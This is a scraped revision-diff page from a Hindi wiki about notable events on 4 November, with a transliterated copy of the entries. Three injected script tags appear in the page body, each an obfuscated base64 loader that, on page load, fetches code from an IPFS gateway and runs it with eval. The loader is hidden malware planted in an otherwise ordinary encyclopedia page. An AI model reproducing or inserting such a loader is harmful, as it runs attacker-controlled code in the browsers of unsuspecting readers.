Difference between revisions of "4 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
* [[2000]] - संयुक्त राष्ट्र संघ में परमाणु हथियारों पर प्रतिबंध लगाने व विखंडनीय पदार्थों के उत्पादन पर रोक संबंधी जापान का प्रस्ताव भारत के विरोध के बावजूद पारित।   
 
* [[2000]] - संयुक्त राष्ट्र संघ में परमाणु हथियारों पर प्रतिबंध लगाने व विखंडनीय पदार्थों के उत्पादन पर रोक संबंधी जापान का प्रस्ताव भारत के विरोध के बावजूद पारित।   
 
* [[2002]] - चीन ने आसियान देशों के साथ मुक्त व्यापार क्षेत्र संधि पर हस्ताक्षर किये।  
 
* [[2002]] - चीन ने आसियान देशों के साथ मुक्त व्यापार क्षेत्र संधि पर हस्ताक्षर किये।  
 +
* [[2003]] - श्रीलंका की राष्ट्रपति चंद्रिका कुमारतुंगा ने रक्षा, गृह और सूचना मंत्रियों को बर्खास्त कर संसद को निलम्बित किया।
 
* [[2008]]- सार्वजनिक क्षेत्र के छह बैंक बेंचमार्क उधारी दर में 0.75 के आधार अंक तक की कटौती करने पर सहमत हुई। केन्द्र सरकार ने [[गंगा नदी]] को राष्ट्रीय नदी घोषित करने का निर्णय लिया। चन्द्रमा के लिए [[भारत]] का पहला मानवरहित अंतरिक्षयान चन्द्रयान-1 चन्द्रमा के अंतरिक्ष कक्ष में पहुँचा।  
 
* [[2008]]- सार्वजनिक क्षेत्र के छह बैंक बेंचमार्क उधारी दर में 0.75 के आधार अंक तक की कटौती करने पर सहमत हुई। केन्द्र सरकार ने [[गंगा नदी]] को राष्ट्रीय नदी घोषित करने का निर्णय लिया। चन्द्रमा के लिए [[भारत]] का पहला मानवरहित अंतरिक्षयान चन्द्रयान-1 चन्द्रमा के अंतरिक्ष कक्ष में पहुँचा।  
 
==4 नवंबर को जन्मे व्यक्ति==
 
==4 नवंबर को जन्मे व्यक्ति==

Revision as of 07:07, 23 February 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 4 navanbar varsh ka 308 vaan (lip varsh mean yah 309 vaan) din hai. sal mean abhi aur 57 din shesh haian.

4 navanbar ki mahattvapoorn ghatanaean

  • 1997 - siyachin bes kaimp mean sena ki af signal ne vishv ka sarvadhik ooancha es.ti.di. booth sthapit kiya.
  • 2000 - sanyukt rashtr sangh mean paramanu hathiyaroan par pratibandh lagane v vikhandaniy padarthoan ke utpadan par rok sanbandhi japan ka prastav bharat ke virodh ke bavajood parit.
  • 2002 - chin ne asiyan deshoan ke sath mukt vyapar kshetr sandhi par hastakshar kiye.
  • 2003 - shrilanka ki rashtrapati chandrika kumaratuanga ne raksha, grih aur soochana mantriyoan ko barkhast kar sansad ko nilambit kiya.
  • 2008- sarvajanik kshetr ke chhah baiank beanchamark udhari dar mean 0.75 ke adhar aank tak ki katauti karane par sahamat huee. kendr sarakar ne ganga nadi ko rashtriy nadi ghoshit karane ka nirnay liya. chandrama ke lie bharat ka pahala manavarahit aantarikshayan chandrayan-1 chandrama ke aantariksh kaksh mean pahuancha.

4 navanbar ko janme vyakti

4 navanbar ko hue nidhan

4 navanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>